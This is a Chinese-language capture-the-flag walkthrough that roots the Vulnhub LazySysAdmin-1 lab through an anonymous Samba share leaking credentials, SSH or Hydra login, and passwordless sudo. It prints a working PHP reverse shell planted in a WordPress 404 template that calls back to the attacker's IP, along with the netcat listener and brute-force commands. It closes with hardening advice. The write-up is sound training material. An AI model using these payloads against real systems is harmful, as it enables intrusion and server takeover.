
Vulnhub之Lazysysadmin靶机完整渗透过程一、靶机基础信息靶机来源Vulnhub LazySysAdmin-1系统Ubuntu 16.04目标获取root权限读取/root/proof.txt攻击机Kali Linux核心漏洞点Samba匿名共享泄露明文账号密码、WordPress后台模板写入Webshell、用户togie拥有完整sudo权限一键提权二、第一步主机发现定位靶机IP工具1netdiscoverARP扫描sudonetdiscover扫描输出会列出局域网存活主机标记靶机IP示例192.168.110.128下文统一用此IP演示工具2nmap网段扫描nmap-sn192.168.110.0/24三、第二步全端口服务详细扫描Nmapnmap-sC-sV-A-p-192.168.110.128开放端口服务清单22/tcpOpenSSH 7.2p2SSH远程登录80/tcpApache 2.4.7Web服务搭载WordPress139/445/tcpSamba 4.3.11SMB文件共享核心突破口3306/tcpMySQLWordPress数据库四、第三步Web目录枚举收集基础线索1. 访问首页http://192.168.110.128静态页面无有效信息2. 读取robots.txt访问http://192.168.110.128/robots.txtUser-agent: * Disallow: /old/ Disallow: /test/ Disallow: /TR2/ Disallow: /Backnode_files/3. dirsearch爆破完整目录dirsearch-uhttp://192.168.110.128关键目录/TR2/WordPress站点页面反复出现My name is togie确定用户名togie/phpmyadmin数据库管理后台/old/、/test/、wp/、Backnode_files/4. WPScan扫描WordPresswpscan--urlhttp://192.168.110.128/TR2/扫描确认WP版本4.8.1主题twentyfifteen无高危插件漏洞暂无法直接漏洞利用转向Samba服务。五、第四步Samba匿名共享枚举核心信息泄露1. enum4linux批量扫描SMBenum4linux192.168.110.128扫描结果显示Samba支持匿名无密码登录共享名称share$2. smbclient连接共享目录smbclient //192.168.110.128/share$-U-N# -U 空用户名 -N 无密码登录后执行ls查看共享文件列表关键文件deets.txt存储系统通用密码wp-config.phpWordPress数据库配置文件可以远程挂载查看共享目录,发现共享的是网站的根目录mount -t cifs -o username’ ‘,password’ ’ //192.168.75.145/share$ /media3. 下载并读取泄露文件# smb交互终端内下载文件get deets.txt get wp-config.phpexit# 本地查看文件内容catdeets.txtdeets.txt内容I forgot my password. All passwords are 12345全平台通用密码12345wp-config.php数据库账号密码在这里插入图片描述define(DB_NAME,wordpress);define(DB_USER,Admin);define(DB_PASSWORD,TogieMYSQL12345^^);同时确认系统用户togie密码12345六、两种获取初始Shell的路径二选一路径ASSH直接登录最简方式推荐方式1凭据直连Samba已拿到账号密码sshtogie192.168.110.128# 输入密码 12345方式2Hydra爆破验证备用hydra-ltogie-P/usr/share/wordlists/rockyou.txt ssh://192.168.110.128爆破命中密码12345登录后获得普通用户交互式Shell。路径BWordPress后台写入Webshell反弹Shell登录WordPress后台访问http://192.168.110.128/TR2/wp-login.php用户名Admin密码TogieMYSQL12345^^编辑主题404模板写入反弹Shell后台侧边栏外观 → 编辑器 → 404模板(404.php)替换原有代码为PHP反弹Shell?phpset_time_limit(0);$ip192.168.110.127;// 攻击机IP$port4444;$shelluname -a;id;/bin/sh -i;$socketfsockopen($ip,$port);dup2(fileno($socket),0);dup2(fileno($socket),1);dup2(fileno($socket),2);exec($shell);?攻击机监听端口nc-lvnp4444访问404页面触发反弹http://192.168.110.128/TR2/wp-content/themes/twentyfifteen/404.php攻击机成功收到togie权限Webshell。###用msfconsolepython -c “import pty;pty.spawn(‘/bin/bash’)”七、第五步本地权限枚举一键Root提权登录togie用户后查看sudo权限sudo-l输出关键信息togie ALL(ALL) NOPASSWD: ALL含义当前用户无需密码即可执行任何root命令无任何权限限制。2. 直接切换root用户sudosu# 无需输入密码直接进入root shell读取最终Flagcat/root/proof.txtFlag示例Well done :) Hope you learnt a few things along the way. Regards, Togie Mcdogie Enjoy some random strings WX6k7NJtA8gfk*w5J3T*Ga6!o05UP89hMVEQ#PT9851 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7 pf%1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$yw%Zhy0U19pu togieLazySysAdmin:~#八、渗透思路总结信息收集优先级网段扫描 → 全端口扫描 → Web目录爆破 → SMB服务枚举本靶机核心泄露源关键漏洞成因管理员配置Samba匿名共享未做文件权限管控明文存储账号密码普通用户被赋予无密码全量sudo权限安全配置极度懒惰。两条攻击链快速链SMB拿账号密码 → SSH登录 → sudo一键rootWeb链SMB拿WP数据库凭据 → 登录WP后台 → 模板写入反弹Shell → sudo提权安全加固建议关闭Samba匿名访问、敏感配置文件禁止共享、严格限制sudo权限、禁止弱口令、WordPress后台开启二次验证。